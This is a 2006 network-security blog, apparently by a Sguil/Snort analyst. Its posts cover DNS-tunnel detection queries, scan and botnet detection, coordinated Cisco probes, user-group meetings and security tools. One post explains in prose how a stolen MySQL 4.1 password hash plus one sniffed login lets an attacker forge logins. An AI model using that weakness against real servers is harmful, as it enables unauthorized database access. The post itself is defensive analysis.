Tuesday, May 30, 2006

InfoSeCon 2006 Report

Earlier this month, I was very fortunate to be an invited speaker at InfoSeCon 2006. This was my second year speaking there, and there are two things you should know about this conference:


  1. It's a small conference, because the organizers are have created an atmosphere where the speakers and attendees mingle freely, discuss issues over dinner and drinks, and actually talk rather than just attend presentations. They've built a community, and this works extraordinarily well for both speakers and attendees.
  2. The location is spectacular. Dubrovnik is a UNESCO World Heritage Site for a reason, and it's no joke when they call it the "Pearl of the Adriatic." In fact, the location is so spectacular that the biggest danger is that your boss will want to go instead. Fight this, or you'll miss the spectacular evening events that make this very much resemble a working vacation.

The conference as a mixture of combined sessions and individual "Management" and "Technical" tracks. The speaker list was headed this year by two big names in the industry: Eugene Kaspersky (of Anti-Virus fame) and Marcus Ranum (of "I invented the firewall and we've pretty much all screwed it up since" fame). Mr. Kaspersky's talks were a little light on the technical content, I thought, having been written by his marketing department. Still, it was interesting to hear him speak about the relationship between malware and organized crime. Nothing that isn't already common knowledge, but he's on the cutting-edge of this fight, so just hearing his thoughts was instructive. He also spoke about the organization of his company's malware lab, but I was fairly disappointed with this, as it lacked substantive detail and mostly just emphasized the fact that they do have such a lab.

Marcus Ranum's talks were much more interesting. In fact, he was something of a lightning rod of controversy, as I understand him to be elsewhere, too. He gave a pair of talks, about the state of the security industry and about the evolution of the firewall. The overarching theme, which became a sort of conference catchphrase, was that "we're doing security wrong." Not that anyone has a comprehensive solution yet, but if the first step is admitting that we have a problem, then I think he's done his job. I don't always agree with Marcus, but after hearing him speak and spending some time with him informally, I think his points are valid.

By the way, remember when I said that the organizers try hard to create opportunities to mingle with the speakers? It works. I really appreciated the opportunity to sit down and have several conversations with Marcus. I also got to spend rather a lot of time with some friends, both new and old, in the Croatian, Slovenian and Slovakian IT industry. We prowled the midieval streets of Cavtat looking for vampire photos and listened to a restaurant full of boisterous Croatian tourists singing along with an accordian. We sailed the Adriatic and scaled the Dubrovnik city walls. We even learned a few things about the discipline of Information Security. All in all, a valuable and enjoyable trip, and I can't wait for InfoSeCon 2007!

Friday, May 19, 2006

Scan detection via network session records

I needed a quick, easy way to detect scanners on my LAN. Since I'm running Sguil, I have plenty of data about network sessions in a convenient MySQL database. I thought, why not use that?

My premise (cribbed from Snort's sfPortscan preprocessor) is that network scanning activity stands out due to it's unusually high number of failed connection attempts. In other words, most of the time the services being probed are not available, and this makes the scanner easier to spot. Here is a simple perl script I wrote that implements this type of scan detection by querying Sguil's SANCP session database.

To use it, you'll need to edit the script to modify the $HOME_NET variable. It's a snippet of SQL code, but it's very simple and documented in the comments. I'm looking for scanning activity on my own LAN, so the default is to set it to search only for activity with two local endpoints. If you are reasonably fluent in SQL, though, you can customize this to find other types of scans. There are a few other variables you can tweak (read the comments) but nothing terribly critical.

The script identifies two types of scanning activity. Portsweepers are systems that try a few different ports across a variety of addresses. For example, malware that looks around trying to find open web servers would fall into this category. On the other hand, portscanners are systems that try a lot of ports, usually on a relatively few systems. Attackers that are trying to enumerate services on a subnet would be a good example.

I haven't really tested this anywhere but a RHEL/CentOS 4 system. If you get it working on some other platform, or if you have any other comments/suggestions/improvements, please post them here.

Thursday, May 18, 2006

The value of privacy

In his latest editorial, The Eternal Value of Privacy, Bruce Schneier provides a compelling answer to the question, "If you aren't doing anything wrong, what do you have to hide?"

Schneier's argument is slanted more towards the national security issues of domestic wiretaps, video surveillance and the like, but his points are also valuable from a cybersecurity perspective.

Many of us are tasked with monitoring for abuses of and intrusions into our computing infrastructure. This means collecting and analyzing data, much of which may be considered personal or private. IDS analysts especially may come into contact with the contents of personal communications such as emails, instant messages or even VOIP calls. We may see web URLs, chat room logs or forum postings detailing medical conditions, alternate lifestyles, or even employment concerns. It is our duty (and in many cases, our legal obligation) to protect this information against disclosure, even to others within our own organizations, unless there is a clear security concern which must be acted upon. Even then, discretion and need-to-know are critical.

If you're reading my blog, you're in a group of people who are likely to tackle thorny privacy issues on a regular basis. I highly recommend taking the time to read Schneier's short editorial and think about how this applies to your own situation.

Wednesday, May 03, 2006

A traffic-analysis approach to detecting DNS tunnels

I had the chance to see a very interesting presentation last week about DNS tunnels. I understand the concepts well enough, but I had never run into one "in the wild." I realized, however, that I probably wouldn't have noticed one in the first place, so I decided to try to do a little digging to see if I could come up with a detection mechanism.

Fortunately, I'm using Sguil to collect all my Network Security Monitoring (NSM) data. As you may know, Sguil collects (at least) three types of data:


  1. Snort IDS alerts
  2. Network session data (from SANCP)
  3. Full content packet captures (from a 2nd instance of Snort)

The packet captures are not typically used for alerting purposes, leaving me with the possibility of using either an IDS signature based approach, or something using traffic analysis on the network sessions.

Some DNS tunnel detection signatures already exist (The Sourcefire community ruleset already has signatures to detect the NSTX tunnel software), but I think this approach is doomed to failure from the start. A signature-based approach would be good for detecting specific instances of DNS tunnelling software, but for real protection, a more general detection capability is required. I chose to try the traffic analysis approach instead.

I started with the assumption that there were basically three uses for DNS tunnels, to wit:

  1. Data exfiltration (sending data out of the LAN)
  2. Data infiltration (downloads to the local LAN)
  3. Two-way interactive traffic

Of course, the fourth possibility is that a tunnel could be used for some combination of the above, but I left that out of the scope for now. I also ignored the possibility of two-way traffic for now, since it's harder and I'm just starting to look into this. My main goal was to identify data exfiltration by looking at "lopsided" transfers. By extension, the same technique could also be used to discover data infiltration, as I'll show.

Once I identified the types of tunnels I wanted to detect, I tried to deduce what their traffic profiles would look like. Specifically, I assumed the following:

  1. At least one side of the session would be associated with port 53.
  2. The tunnel could use either TCP or UDP (though UDP is the most likely), but since SANCP is able to construct psuedo-sessions from sessionless UDP traffic, I could effectively ignore the difference between TCP and UDP sessions.
  3. The upload/download ratio would be lopsided. That is, the tunnel client would either be sending more data than they recieve (exfiltration) or vice versa (infiltration).

If you're not familiar with Sguil, just know that all the network session data is stored in a MySQL database. Although you normally access this data through the Sguil GUI, it's also easy to connect with the normal MySQL client application and send arbitrary SQL queries. I
started with this one:

select start_time, end_time, INET_NTOA(src_ip), src_port,
INET_NTOA(dst_ip), dst_port, ip_proto, (src_bytes / dst_bytes) as
ratio from sancp where dst_port = 53 and start_time between
DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2 order by ratio DESC LIMIT 25;

The intent of this query is to identify at most 25 DNS sessions during the last week where the initiator (the client) sends at least twice as much data as it receives in response. Sounds good, but it is actually a bit naive. It turns out that many small transactions fit this profile, especially if the DNS server doesn't respond (the response size is 0 bytes).

I fixed this problem by also looking for a minimum number of bytes transferred (in either direction). After all, the purpose of a DNS tunnel is to transfer data, so if there are only a few bytes, the odds are very, very good that it's not a tunnel. In this version, I've set up the query also to check that the total number of source and
destination bytes is at least 50,000:

select start_time, end_time, INET_NTOA(src_ip), src_port,
INET_NTOA(dst_ip), dst_port, ip_proto, (src_bytes + dst_bytes) as
total,
(src_bytes / dst_bytes) as ratio from sancp where dst_port =
53 and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and
CURDATE() having ratio >= 2 and total > 50000 order by total DESC,
ratio DESC LIMIT 25;

This brings the number of false positives down quite a bit. If this still isn't good enough, you can tune both the ratio and the total bytes to give you whatever level of sensitivity you feel comfortable with. Increasing either number should decrease false positives, but at the expense of creating more false negatives (ie, you might miss some tunnels).

By the way, I mentioned before that you could use the same approach to detect either exfiltration or infiltration. The queries above are written for exfiltration, so if you would like to look for infiltration, simply change the definition of the "ratio" parameter from this:

(src_bytes / dst_bytes) as ratio

to this:

(dst_bytes / src_bytes) as ratio

That'll look for data going in the other direction. The rest of the query is identical for either case.

As I mentioned, I've never encountered a DNS tunnel outside of a lab environment (yet), so I can't say how well my approach holds up in the real world. If anyone with more experience would like to comment, I'm all ears. Similarly, if anyone decides to try out my method, I'd love to hear how it works out for you.

Update 2006-05-04 14:33: My fellow #snort-gui hanger-on and all-around smart guy tranzorp has posted additional analysis of my ideas on his blog. Specifically, he points to two easy ways to evade this simple type of analysis, and I recommend that you read his post for yourself, because he's got a lot of experience with this topic.

If you just want a quick 'bang-it-out-in-an-emergency' check for tunnels, the following updated query isn't bad. It's the same as above, but corrects for the fact that the DNS reply contains a complete copy of the DNS query, as tranzorp pointed out:

select start_time, end_time, INET_NTOA(src_ip), src_port,
INET_NTOA(dst_ip), dst_port, ip_proto,
(src_bytes + (dst_bytes - src_bytes)) as total,
(src_bytes / (dst_bytes - src_bytes)) as ratio
from sancp where dst_port = 53 and
start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and
CURDATE() having ratio >= 2 and total > 50000 order by total DESC,
ratio DESC LIMIT 25;


Based on feedback I've received from tranzorp and others, I'm looking at a more statistical approach to the problem. In short, I'm experimenting with computing a psuedo-bandwidth for each session (bytes sent / session duration), then looking for abnormally high or low bandwidth sessions. I've got a prototype, but it's in perl so it's horribly inefficient for the mountain of DNS session data I collect. I'll post something about it when I have had a chance to tweak on it some more.

Tuesday, May 02, 2006

Unintentionally acknowledging the truth

Here's a funny typo in a recent article about Verizon upgrading the bandwidth on it's fiber-to-the-home service:

The 30-Mbit premium tier was left untouched, in bot performance and price.

Too true, I'm afraid. Too true.

Sunday, April 30, 2006

New HRSUG Website Launched

I'm pleased to announce the grand opening of the new HRSUG website at hrsug.org. The site will carry the latest information about HRSUG meetings and happenings, and separates the information from my personal blog (this one).

I also hope to publish network security-related notes or articles contributed by HRSUG members. If you want blog posting privileges, let me know and I can add you to the list.

Let's keep this announcement short and sweet. Remember, HRSUG is for the members, so let me know if you have ideas for improving the site.

If you read this far, it may also interest you to know that the May HRSUG meeting is coming up this week.

Wednesday, April 19, 2006

EIDE/SATA USB adapter cable, good for forensics?

This product looks like it could really be nice for acquiring images of suspect hard drives.

One interesting feature is that you can connect both the EIDE and the SATA drive at the same time. I guess it could be a bit slow trying to acquire an image when both the source and destination drives are on the same USB port, but on the other hand it's a lot more portable than a full tower rig, so things might balance out.

The obvious problem is the lack of an integrated write-blocker, but I guess you could use your own along with this device.

Anyone tried one yet?

Tuesday, April 04, 2006

April HRSUG Meeting Reminder

Hi, all. I just want to remind everyone that the April meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Thursday, 6 April 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

The topic for the meeting will be "EZ Snort Rules", an introduction to writing basic IDS rules in everyone's favorite pig-themed IDS. See you there!

Update 04/06/06 22:30: I've posted the slides for my presentation on the Vorant downloads page. The full title of the talk is "EZ Snort Rules: Find the Truffles, Leave the Dirt".

Thursday, March 30, 2006

MySQL 4.1.x authentication internals

While reviewing the deployment plans for a new MySQL server yesterday, I started wondering about the security of the authentication protocol it uses. Most of the users of the new database would be accessing it via the LAN, without the benefit of SSL encryption. It's well known that the MySQL 3.x authentication protocol is vulnerable to sniffing attacks, so MySQL 4.1 introduced a new authentication scheme designed to be more secure even over a plaintext session. But was it good enough?

I first spent some time to understand exactly how the protocol works. Thanks to some kind folks in the #mysql channel on irc.freenode.net, I located the MySQL internals documentation page the describes the authentication protocol. Unfortunately, this page doesn't really describe what's going on in the 4.1 protocol, so I turned to the source code for the definitive scoop.

Just so no one else has to do this again, here's a better description of how the protocol works, based on the 5.0.19 release. Look in libmysql/password.c at the scramble() and check_scramble() functions if you want to check the source code for yourself.

The first thing to know is that the MySQL server stores password information in the "Password" field of the "mysql.user" table. This isn't actually the plaintext password; it's a SHA1 hash of a SHA1 hash of the password, like this: SHA1(SHA1(password)).

When a client tries to connect, the server will first generate a random string (the "seed" or "salt", depending on which document you're reading) and send it to the client. More on this later.

Now the client must ask for the user's password and use it to compute two hashes. The first hash is a simple hash of the user's password: SHA1(password). This is referred to in the code as the "stage1_hash". The client re-hashes stage1 to obtain the "stage2_hash": SHA1(stage1_hash). Note that the stage2 hash is the same as the hash the server stored in the database.

Next, the client hashes the combination of the seed and the stage2 hash like so: SHA1(seed + stage2_hash). This temporary result is then XORed with the stage1 hash and transmitted to the server.

Now the server has all the information it needs to know whether the user supplied the correct password. Remember that the server stores the stage2_hash in the database, and it originally created the seed, so it knows both of those. What it wants to recover is the stage1_hash. Fortunately, the data transmitted from the client is simply the seed and the stage2 hash, XORed with the stage1 hash. To recover the stage1 hash, the server simply has to recompute the hash SHA1(seed + stage2_hash), then XOR it with the data provided by the client. The result will be the stage1 hash. Since the stage2_hash is simply SHA1(stage1_hash), the server can simply compute a new stage2_hash and compare it to the hash in the database. If the two hashes match, the user provided the proper password.

Ok, I admit that was probably a little confusing, but here's where I think it gets really interesting. There is a flaw in this protocol. The security depends on keeping two pieces of information a secret from attackers: the stage1 and stage2 hashes. If the attacker knows both hashes, they can construct a login request that will be accepted by the server.

Stage2 hashes are protected by keeping the database files away from prying eyes, but if an attacker were to steal the database backup tapes, for example, the hashes for all database accounts would be in his possession.

Still, just having the stage2 hashes is not enough. The final piece of the client authentication credential is XORed with the stage1 hash, yet the server doesn't know the stage1 hash. Therefore, the protocol provides it with all the information it needs to know in order to derive the stage1 hash. Unfortunately, that means that the same information could be derived by anyone who could sniff a valid authentication transaction off the wire and who also possessed a copy of the stage2 hash.

So the weakness is that if an attacker has the stage2_hash stored in the db, and can observe a single successful authentication transaction, they can recover the stage1_hash for that account. Using both hashes, they can then create their own successful login request, even without knowing the user's actual password.

I've confirmed this with the MySQL team, who say that this is a known issue. It is difficult to exploit, I think, since you need a fair amount of information in order to make the attack successful. Frankly, if you already have the password hashes, you probably also already have the rest of the info in the database as well, so this might be overkill. Still, I had fun working through this last night, so I thought others might enjoy it as well. At the least, maybe I'll save someone else the time I spent understanding how the protocol works.

If this vulnerability really concerns you, you can protect the stage1 hash information by using MySQL's built-in SSL session encryption support. You should probably also be encrypting your backup tapes to protect the stage2 hash and all the data.

Friday, March 17, 2006

Detecting common botnets with Snort

I've been reading up on the mechanics of how popular bot software actually works, with an eye towards detecting it on the wire. I've been using the BLEEDING-EDGE ATTACK RESPONSE IRC - Nick change on non-std port and its cousins, which attempt to detect botnets and other "covert" channels that think they're clever by sending IRC protocol traffic over ports that are not normally associated with IRC. These work well, have two problems:


  1. Some IM programs (like ICQ and MSN Messenger) use the IRC protocol on various ports and thus trigger this rule
  2. The rule doesn't detect botnet traffic if they happen to use the standard IRC port (6667)
One of the papers I've been reading recently was this great overview of four popular bot packages, An Inside Look at Botnets by Paul Barford and Vinod Yegneswaran. This isn't groundbreaking new research by any means, but they have started to put together some basic practical information about how these things work on the wire.

Having read that paper, I decided it would be fun to write a set of Snort rules to detect traffic generated by the four bots they mention. That would at least address the part of the problem #2, so could be a very worthwhile effort as well. Here are the rules, suitable for inclusion in your own local.rules file.

For those who are curious about what these do, there are three functions. The first rule (sid 9000075) attempts to define IRC protocol traffic, no matter what port the server is using. It sets the "is_proto_irc" flowbit on the session, so the later rules can depend on this to be set and won't do a lot of work inspecting non-IRC packets. This rule will never generate any alerts; it's only there to make the other rules in this file more efficient.

The second rule (sid 9000076) isn't necessarily related directly to botnets. It looks for IRC servers that seem to be on your local network and are communicating with outside hosts. If you actually do run a legitimate server, modify or comment this out as appropriate.

All the rest of the rules look for specific commands used by AgoBot/PhatBot, SDBot, SpyBot and GTBot. The GTBot commands are slightly more complex. All the others just use plain words (like "portscan ") for commands, but GTBot uses a command character to distinguish commands from other data (like "!portscan "). Since it seemed to me that the command character was likely to change from botherder to botherder, I coded in a regular expression that tried to allow a variety of possible cmdchars. You'll see those in the rules.

Anyway, feel free to use these rules if you like. I won't guarantee they work well yet, since I haven't been running them long, but so far so good. They probably won't crash your snort process, but that's about all I can say about them. I will give you one note of caution: If you find an active botnet, you may generate a lot of alerts. Consider using thresholding to avoid overwhelming your IDS analyst.

If you actually detect a botnet through these rules, please let me know. As far as I know, I have no active botnets right now, so I've only been able to test them against contrived traffic and not live data. I'd like to know if they do or do not work in the wild.

Update 4/4/2006: These bot rules are now included as part of the snort.org community ruleset. Thanks to Sourcefire's Alex Kirk, who made the rules better by pointing out that I forgot to add the "nocase" directive to make the rules case-insensitive. If you're using my rules, I recommend that you remove them and have a look at the community rules instead.

Tuesday, February 28, 2006

I'm finally caving in...

...and sitting the CISSP exam. I mentioned this to a few people today and got one of two reactions:


  1. They immediately lost all respect for me, or
  2. Ok, I lied. There was only one reaction.

I admit this was based on a rather limited sample, but wow. People really seem to hate the CISSP, all it stands for, it's dog and the horse it rode in on.

I've read some of Richard Bejtlich's thoughts on the matter (which made quite the splash when they were originally published). I agree with him that the ISC(2) code of ethics is pretty much all the CISSP has going for it, but I don't think that explains the vituperousness of the reactions I see whenever CISSP is mentioned. Nor do I necessarily think it's jealousy, because most of the people I get this from could easily pass the exam (if they were willing to pony up the $500 fee).

It seems to me as though I've detected a bit of a pattern, though: the more comfortable a person is working with technical matters, the less likely they are to respect the CISSP. Is it just our geeky tendency to look down upon those things which can be done by any suit and tie lackey? Is the perception that
CISSP == management == PHB? I don't think it's really that simple, but maybe us geeks just need someone to love to hate and Bill Gates wasn't available today.

If anyone has any theories they'd like to share, or if you hate people who hold CISSPs and would be kind enough to let me know why, please leave a comment.

Sunday, February 26, 2006

March HRSUG meeting

Hi, all. I just want to remind everyone that the March meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Wednesday, 8 March 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040


As of this moment, there is no topic assigned to the meeting. I'll work on that, but if anyone has a suggestion or would like to volunteer to talk about something, please let me know.

Friday, February 24, 2006

Weird Cisco attacks happening all over the world

On February 4th, I started seeing small numbers of the following Snort alert:

Cisco IOS HTTP configuration attempt

Here's a breakdown of the number of alerts per day for the first couple of weeks of the month:


| 2006-02-04 | 6 |
| 2006-02-05 | 4 |
| 2006-02-13 | 2 |
| 2006-02-14 | 1 |
| 2006-02-15 | 30 |
| 2006-02-16 | 26 |

There were two things that drew my attention to this activity. First, it's an old exploit (detailed in this advisory. Second, there was a sharp spike in activity starting on the 15th.

Around the same time as I noticed this, the SANS ISC Handler's Diary posted an entry about it, and they didn't know what was going on either. I contacted them about it, and have since heard nothing in reply.

I didn't think too much about this at first, but after collecting a few more days' worth of data, I noticed the following: Each source IP only attacked one destination IP, and while is usually a steady stream of 3 or 4 alerts per hour, there are some periods where I go for several hours without seeing anything. These things tend to suggest that the attacks are coordinated, probably through a single botnet.

Today, I heard from several other analysts around the planet who have seen similar traffic. I got the IPs and timestamps from a few of them and am in the process of analyzing some of the data. What I can see so far is that we've got around 280 individual attacks from ~250 unique IPs. Each of the three sites reporting has at least a few IPs in common with the others, further supporting my idea that this is all due to one big botnet.

I don't have much information yet, but big thanks to fellow #snort-gui regulars David Lowless and hewhodoesnotwishtobenamedbutknowswhoheiseventhoughIrefusetousehiscodenameJesus for providing data and sharing thoughts & ideas about this. It may all just turn out to be nothing, but the coordination and stealth involved make it interesting if nothing else.

Update 2006-02-24 15:53: I asked around on the #shadowserver channel, and have found that attacks like the ones I observed have been found in at least one active botnet (not sure if the scattered sightings are from different botnets or not).

Why they are probing for 5 year old vulnerabilities in Cisco routers is still a mystery. Maybe they just want to use them as proxies for IRC/spam/other attacks. I hope that's the extent of their ambitions.

Update 2006-03-06 11:41: Based on conversations I've had with others who are experiencing these sorts of attacks, I've concluded that the most likely scenario is that the perpetrator is hoping to gain access to Cisco devices in order to use them as IRC proxies to hide their true network address while trading credit card numbers and other illicit info. In other words, they can log on to the devices and initiate outbound network connections to IRC servers. One analyst speculated that there may be an IRC client plugin of some sort to facilitate this, and that seems like a reasonable assumption.

BTW, if this technique is used to disguise IRC, it may also be used to disguise connections to other services as well (HTTP?). This all seems like a pretty roundabout way to achieve the hypothesized goal, but certainly in keeping with technology that existed at the time the original exploit was discovered. Maybe someone is just using some old scripts they found online somewhere?

Update 2006-03-07 06:53: The Philippine Honeynet Project (which I reached via this SANS ISC diary entry) has also noticed these probes. Their analysis includes the name of the tool they believe responsible (ciscoscanner). Unaccountably, though, they're suggesting that the tool is looking for the vulnerability listed in this advisory, which doesn't seem to fit the observed data. It's good to read that some other people have finally noticed this, at least. They kind of stick out like a sore thumb if you're paying attention.

Tuesday, February 14, 2006

Dshield for IDS systems?

Most of us are probably familiar with the Dshield project, which collects firewall logs from users around the planet. They process this data to extract attack trends and produce reports we can use to help evaluate the potential "hostileness" (my term) of a given IP address.

While going through my morning sguil operations, I thought to myself, "Why haven't we done this for IDS events yet?"

My idea is very simple. Sguil requires an analyst to assign each event to a different category (e.g., "successful admin compromise", "attempted compromise", "virus activity", "no action required", etc). For those categories which correspond to confirmed malicious intention, why not collect data about the alerts and forward them to a central clearinghouse?

Of course, you wouldn't want to collect all the data, for privacy reasons. You'd probably only want the attacker's IP, the timestamp and a common reference number to show what event occurred (the snort sid, for example, though that only applies to a single IDS). You could further apply some basic rules to the data before submission, to delete all records originating from your own network, for example.

So what would be some of the benefits of this system? First, the clearinghouse would be in a position to notice hosts which were attacking large segments of the Internet. This determination would be based on confirmed data submitted by human analysts and would therefore be more inherently trustworthy than data garnered from firewall logs. Second, the clearinghouse could directly observe and report on the types of attacks being seen in the wild, something the existing Dshield project cannot do. Finally, this data could be fed back down into the IDS analysis tools to help adjust the severity of observed events based on how similar events were previously categorized by other analysts. Sort of a Cloudmark for IDS.

I'm not suggesting that there's anything wrong with Dshield. They're providing a great service that I rely upon to help me make decisions every day. It's just that they're only capturing one type of data (firewall logs). I think their model could logically be extended to IDS operations, to the benefit of the entire community.

Update 02/14/2006 11:36: Someone on the #dshield IRC channel mentioned that this idea also sounds similar to Shadowserver. True enough, though they're using their own net of mwcollect and Nepenthes collectors to track malware distribution, and so they're not capturing IDS data. Great for tracking automated attacks and generating high-quality blacklists of sites actually distributing malware. Not quite what I had in mind, but also a very valuable dshield-esque service. Check them out, but keep in mind that they haven't gone public with their data yet. If you ask nicely, though, they might give you access to the IRC channel that keeps track of the botnet reports in realtime. I'm going to check it out.

Sguil 0.6.1 released

There's a new Sguil release to start your morning. 0.6.1 features an updated client that's more responsive to large data sets. It also has some major new features, like:


  • The use of UNION in the MySQL queries is now the default. This has led to at least an order of magnitude decrease in the search time in my own (huge) SANCP database.
  • There's a new panel that displays snort statistics for each sensor. This finally allows you a semi-realtime view of packet loss and traffic/session statistics for each sensor.
  • Communication between the sensors and the server can now be encrypted with OpenSSL/TLS, using the same mechanism that protects the traffic between the client and server.
  • Numerous important bug fixes

I've been using the prerelease version of this code for a little while now, and it works a heck of a lot better than 0.6.0p1 did.

One thing that I did notice is that it's not quite a drop-in replacement for the old version. If you are using TclTLS to encrypt client/server communications, you will need to add the "-o" command line flag to your startup script to turn this feature on. In previous versions, specifying the TLS library location with "-O" was enough, but now two subsystems can use the same library (the client and the sensor communication paths) so you have to explicitly tell sguild which one(s) you want to encrypt.

This small caveat aside, if you're using sguil, you probably should upgrade at your earliest convenience.

Wednesday, February 08, 2006

Packet fragmentation issues in the Snort IDS

One of the features that will eventually make it into Snort is a new processor for handling fragmented IP packets (the "frag3 preprocessor"). Sourcefire's Judy Novak has written a paper outlining the challenges to doing proper fragmentation reassembly, entitled Target-Based Fragmentation Reassembly.

It just so happens that Judy is speaking on this topic tonight at our HRSUG meeting, so if you're looking for more information about frag3 issues, now you have the link.

Update 2006-02-14 08:53: As Joel Esler pointed out, I got this whole topic badly wrong. I'm not really sure why, since I'm pretty familiar with frag3 and have been using it for some time. Maybe I was just rushed. Yeah, that's it.

Anyway, the actual topic was the new stream5 TCP stream reassembly preprocessor, and it's application of target-based stream reassembly policies. It was, by the way, and awesome presentation! Thanks, Judy, and come back to see us any time!

Tuesday, February 07, 2006

DDoS bot owner's story

A web server managed by fellow #snort-gui regular Chas Tomlin was recently attacked and turned into a DDoS zombie. Chas wrote up his experience and shows how he used a combination of network (sguil) and host forensics to track down the source of the problem. A good read, and he includes code, too. My favorite part is the IRC log where he secretly captured two of the bot operators chatting about the how they got in.

Monday, February 06, 2006

Disabling IPv6 under Linux

I set up a sguil sensor at home this weekend, and decided to have it monitor outside my firewall, just because I wanted to know what things looked like out there. This was a version of Linux, and I followed the standard host hardening prescription of turning off unecessary services and interfaces. Since I'm not using IPv6, I wanted to turn support for it off entirely.

Being too lazy to compile my own kernel (good bye, easy updates) I wanted to find a good way to disable IPv6 globally. It turns out that the easiest thing to do is to add the following to your /etc/modules.conf file, then reboot.


alias net-pf-10 off

This prevents the kernel from loading the module that supports IPv6 (called, "ipv6"). This is a CentOS 4.2 box, and I could find no easier way of accomplishing the same thing.

February HRSUG Meeting Reminder

Just a reminder that the February meeting of the Hampton Roads Snort Users' Group is this week:


Date: 8 Feb 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

Our guest speaker is Sourcefire's Judy Novak, who will be speaking about target-based fragment reassembly in Snort. Judy's bio and presentation abstract can be found in the original meeting announcement.

Sunday, February 05, 2006

BackTrack Security LiveCD Beta

I don't watch football (Superbowl? What's that?) so while the entire US is shut down to watch an East Coast/West Coast smackdown, of course I'm playing with the new BackTrack LiveCD.

In case you're not familiar with this project, this is the first beta release of the projects formerly known as Auditor and WHAX, merged into a single distribution that looks, on first glance, like a really strong offering.

I never used WHAX, but I have followed Auditor for about a year. It was a really nice collection of pre-installed security tools, mostly hacking and cracking packages like network scanners, vulnerability assessment tools, bluetooth utils, password crackers and the like. Not only did the OS offer reliable hardware autodetection, but the Auditor team went through a lot of trouble to add run-time autoconfiguration to many of the included tools (think: no more editing kismet.conf).

This version of BackTrack will look very familiar to Auditor users. It preserves much of Auditor's look-and-feel, including the task-oriented launch menu that made it so easy to find the right tool for the situation. There are still an awful lot of tools available, though I haven't compared the lists to see which were added or dropped in the conversion to BackTrack.

While the old Auditor releases were monolithic CD images, BackTrack is based on the SLAX Slackware LiveCD, and now offers easy GUI-based ISO customization. This was originially a feature of WHAX/SLAX. This customization feature makes it easy to create a specialized BackTrack ISO for whatever you have in mind.

For example, even though the beta was just released today, I found that there were already three patches available. You read that right: patches for a LiveCD ISO. I downloaded the three module files from the BackTrack website as well as the Windows-based SLAX customization tool, MySLAX Creator. Within about 1 minute, I had remastered the ISO to include the new patches. Sure enough, at boot time it recognized the additional modules and loaded them into the running image.

Although the software on the beta release is not itself modularized, this is planned for the future, giving users the ability to strip out things they won't need. Users can already create additional modules to add to their ISO images, and I may try this with the Sguil and InstantNSM software.

Tomorrow, I hope to find time to play with some of the included tools some more, especially the bluetooth utilities. In the meantime, if you're at all interested in a security tools LiveCD, you really should give BackTrack a try.

Thursday, February 02, 2006

My experience with m0n0wall

My home LAN's firewall router died last night. I had an old Linksys with which I was fairly satisified. It's cheap, quiet, doesn't use much power, and of course, keeps people off my network. When it died, I was kind of annoyed (I've only had it about 18 months) but I've seen this coming for a few days now. Firewall crashes, DHCP problems and the unexplained inability to access the management port while Internet access is working had been the normal state of affairs. This is all to say that I'd been looking around.

Since I'm a hands-on kinda guy, I have been looking around at some of the specialized firewall OS distributions, all Open Source. The leader here seems to be m0n0wall, which is a stripped down OpenBSD. When my firewall finally died, I had already downloaded the distribution CD image (about 5MB), but hadn't tried it out yet. So of course, I figured "no time like the present."

I was very pleasantly surprised to learn that the whole installation and configuration experience took me only about 20 minutes. About half that time was spent removing a network card from an older system and adding it to the firewall box and burning the ISO image to a CDR.

I started by booting the CDROM and configuring the NICs. Not being a BSD user, I would never have guessed that my interfaces were named things like dc0 or xl0, but fortunately m0n0wall has a nifty autodetection routine that will detect which cards you have available and which is plugged into the LAN or the WAN side of your network. I didn't have to know anything about BSD NICs, so that was nice.

After that, everything was done via the web interface. I plugged in my powerbook (yay for the magic no-crossover-cable-required Ethernet port!) and started configuring. If you're used to consumer grade products like my old Linksys, you'll be glad to hear that m0n0wall supports HTTPS connection security, although not by default. In what is probably the only gotcha in the whole process, m0n0wall will not generate a unique SSL certificate for you, so you're sharing the same cert used by every other m0n0wall owner. If you haven't changed the certificate, you have no security. There is a GUI interface to upload your own certificate, but you have to generate it yourself. M0n0wall won't do this for you.

Shortly thereafter, I had the whole thing up and running. NTP, DHCP server & client, Dynamic DNS and traffic shaping. I even had the chance to try out some of the snazzy statistics features, like the interface usage graphs, which are very impressive. Take that, Linksys!

Overall, I'm very impressed with the software. The hardware is a stock PC, though, which eats power and generates noise. The m0n0wall software also supports the Soekris 45xx and 48xx series systems, which seems like a good platform for this application. I'll probably try this eventually, but in the meantime I'm loving the creamy m0n0wall goodness.

Update 2006-02-02 09:21 Sorry, m0n0wall is a stripped down version of FreeBSD, not OpenBSD as I mentioned above.

Wednesday, February 01, 2006

One of the best I've seen

We all know that seemingly innocuous email can hide all manner of nasties. Somehow, we still have the misconception that "I can tell a fake when I see it." Think so? Check out this email purportedly from F-Secure.

I don't meant to gush over the efforts of malware writers, but this is one of the best email social engineering attempts I've ever seen. The email is well written and literate. It purports to address a legitimate problem and offers assistance in solving it. More importantly, it triggers almost none of the usual heuristics users use to identify malicious email. The sender has even chosen the spoofed "From:" address carefully, so as to allay any fears that there might be a unwelcome payload. Who could possibly expect bad things from one of the world's leading anti-virus companies?

I say these things not to praise the spammers (who are, after all, greedy scumbags), but to point out that the bar for this sort of attack has been raised. Are your users prepared for this?

Monday, January 30, 2006

John 1.7 released

If you follow such things, John the Ripper 1.7 is out. There are some pretty big-looking performance increases over the 1.6 release, so this is probably worth looking into if you need to crack passwords.

Wednesday, January 25, 2006

Fight back with StopBadware.org

I ran across this USAToday article that introduces a new idea in the fight against adware, spyware and other deceptive software distribution practices: public shaming. StopBadware.org is a clearinghouse for reports of software distributed with pernicious "extras".

The site is run as a cooperative venture between Harvard's Berkman Center for Internet & Society, The Oxford Internet Institute and Consumer Reports WebWatch. Before downloading software, users can check StopBadware.org to see what they're really getting along with that elf-bowling game. It's a community-driven effort that relies on users to submit reports for inclusion in the database, so there are no listings yet (it just opened up today).

